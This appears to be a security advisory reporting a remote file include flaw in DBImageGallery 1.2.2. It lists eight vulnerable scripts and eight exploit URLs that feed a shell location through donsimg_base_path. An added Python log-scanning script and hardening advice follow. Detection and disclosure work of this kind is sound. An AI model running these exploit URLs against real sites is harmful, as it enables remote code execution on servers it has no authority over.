
DBImageGallery Remote File Include



Remote File Include In DBImageGallery



Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD@BsdMail.Com 
Download Script : 
http://www.dbscripts.net/download/?file=1 

B.Files:

admin/attributes.php    -> require_once $donsimg_base_path
admin/images.php        -> require_once $donsimg_base_path
admin/scan.php          -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php   -> require_once $donsimg_base_path
includes/images.php     -> require_once $donsimg_base_path
includes/utils.php      -> require_once $donsimg_base_path
includes/values.php     -> require_once $donsimg_base_path
 
Exploits : 

http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack] 
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack] 
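The pattern the advisory describes is a script that passes a request-controlled variable straight into require_once. From the defender's side, the useful observation is that no legitimate client ever needs to send donsimg_base_path, so its mere presence on a request to one of the eight files above is a reliable indicator, and a value that starts with a URL scheme is the remote-include case itself. The following detection script is an added example written for this page; it is not code from the advisory author or from DBImageGallery. It assumes Apache/nginx Common Log Format, an install under /gallery/, and uses constructed log lines with documentation-range addresses and a placeholder host.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The eight include files named in the advisory, relative to the
# DBImageGallery install root.
VULNERABLE_SCRIPTS = (
    "admin/attributes.php",
    "admin/images.php",
    "admin/scan.php",
    "includes/attributes.php",
    "includes/db_utils.php",
    "includes/images.php",
    "includes/utils.php",
    "includes/values.php",
)

# The variable the advisory shows being passed straight into require_once.
# Legitimate clients never need to send it, so any occurrence is suspicious.
TAINTED_PARAM = "donsimg_base_path"

# A value beginning with a stream-wrapper scheme (http://, ftp://, ...) would
# make require_once fetch code from elsewhere, so it is rated higher than any
# other client-supplied value.
REMOTE_SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Minimal Common Log Format parser: client IP, timestamp, request target, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(target):
    """Return (script, value) when the request path is one of the vulnerable
    includes and the query string carries the tainted parameter; else None."""
    parts = urlsplit(target)
    script = next(
        (s for s in VULNERABLE_SCRIPTS if parts.path.endswith("/" + s)), None
    )
    if script is None:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if TAINTED_PARAM not in params:
        return None
    return script, params[TAINTED_PARAM][0]


def scan_log(lines):
    """Return one finding per request that supplies donsimg_base_path to a
    vulnerable script. Severity is 'high' when the value looks like a remote
    URL (the include would load code from another host) and 'medium' for any
    other client-supplied value (the script still took its include path from
    the request)."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue  # not Common Log Format; skip rather than guess
        hit = classify_request(m.group("target"))
        if hit is None:
            continue
        script, value = hit
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "script": script,
            "value": value,
            "status": int(m.group("status")),
            "severity": "high" if REMOTE_SCHEME.match(value) else "medium",
        })
    return findings


# Constructed sample log lines (documentation-range IPs, placeholder host);
# not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2007:13:55:36 +0000] "GET /gallery/admin/images.php?donsimg_base_path=http://198.51.100.9/x.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Feb/2007:13:56:01 +0000] "GET /gallery/index.php?page=3 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [10/Feb/2007:13:56:12 +0000] "GET /gallery/includes/utils.php?donsimg_base_path=foo HTTP/1.1" 500 0',
    '192.0.2.10 - - [10/Feb/2007:13:57:44 +0000] "GET /gallery/admin/scan.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['script']} "
              f"<- {f['value']!r} (HTTP {f['status']})")
```

Run against the sample, the first and third lines are flagged (high and medium) and the other two are ignored. Detection only tells you it happened; the durable fix is in the application: $donsimg_base_path must be set by the script itself rather than taken from the request (this class of bug depends on register_globals, which should be off), and disabling allow_url_include and allow_url_fopen in php.ini removes the remote-URL variant even if a script still includes a tainted path.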


